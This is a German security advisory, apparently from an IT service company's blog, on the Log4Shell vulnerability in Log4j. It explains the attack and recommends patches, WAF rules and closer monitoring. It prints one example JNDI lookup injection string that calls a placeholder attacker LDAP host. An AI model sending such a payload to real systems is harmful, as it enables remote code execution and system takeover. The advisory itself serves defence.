Warnstufe „Rot“ : Zero-Day-Exploit in Log4j

Zum zweiten Mal in diesem Jahr hat das BSI die höchste Alarmstufe „Rot“ ausgerufen. Betroffen ist die kritische Schwachstelle namens Log4Shell in der verbreiteten Java-Logging-Bibliothek Log4j.
Gefährlich ist die Schwachstelle zum einen, weil bereits ein Proof of Concept (PoC) öffentlich verfügbar ist und zum anderen, weil die Java-Bibliothek ein weit verbreitetes Produkt ist, welches sich in vielen weiteren Anwendungen wiederfindet. Außerdem ist ein Angriff mit geringem Aufwand möglich. Die erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht die vollständige Übernahme des Zielsystems.

Wie gehen Angreifer vor?
Log4j zeichnet Meldungen auf, damit diese später nachvollzogen werden können. Unter bestimmten Umständen werden die in die Log-Datei geschriebenen Zeichenketten auch interpretiert, um zusätzliche Informationen zur Konfiguration hinzufügen zu können. Die Angreifer senden eine manipulierte HTTP-Anfrage an das verwundbare Zielsystem. Die Anfrage enthält bestimmte Parameter und die Domain des Servers, der vom Angreifer kontrolliert wird. Aufgrund der genutzten Parameter wird versucht, weitere Informationen von dem Server des Angreifers zu laden. So können alle Arten von Schadsoftware auf dem verwundbaren System abgelegt und ausgeführt werden.

Eine mögliche Anfrage sieht wie folgt aus:
${jndi:ldap://angreifer.server.de/x}

Was können Betroffene tun?
Zunächst muss überprüft werden welche Third-Party-Software, die Sie nutzen, betroffen ist. Einen ersten Überblick können Sie sich hier verschaffen. Wurde eine betroffene Anwendung entdeckt, sollten Sie beim Hersteller nach Updates oder Workarounds suchen und diese umsetzen.
Für die Log4j-Bibliothek gibt es bereits ein Update, das umgehend installiert werden sollte, wenn eigene Applikationen mit Log4j eingesetzt werden. Weitere Maßnahmen können das Blockieren von bereits bekannten bösartigen IP-Adressen auf der Firewall oder das Blockieren von gefährlichen Zeichenketten auf einer Web Application Firewall (WAF) sein. Zusätzlich sollte das Monitoring erhöht werden, um die Systeme angemessen überwachen zu können.

Sicherheitsforscher gehen davon aus, dass uns diese Sicherheitslücke noch Monate, wenn nicht sogar Jahre verfolgen wird. Mithilfe sogenannter Backdoors bauen sich Kriminelle eine Hintertür in das System, um bei Bedarf erneuten Zugriff zu erhalten. So kann es dazu kommen, dass zunächst nichts passiert und es erst nach Monaten zu Lösegeldforderungen kommt.  

Wie die letzten Monate zeigen, nehmen schwerwiegende Sicherheitsvorfälle wie dieser immer mehr zu. Mithilfe von regelmäßigen Schwachstellenanalyse können Sie Ihre IT-Infrastruktur stärken und Ausfälle vermeiden.

Wir helfen Ihnen gerne bei Ihren Fragen weiter.

Quelle: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation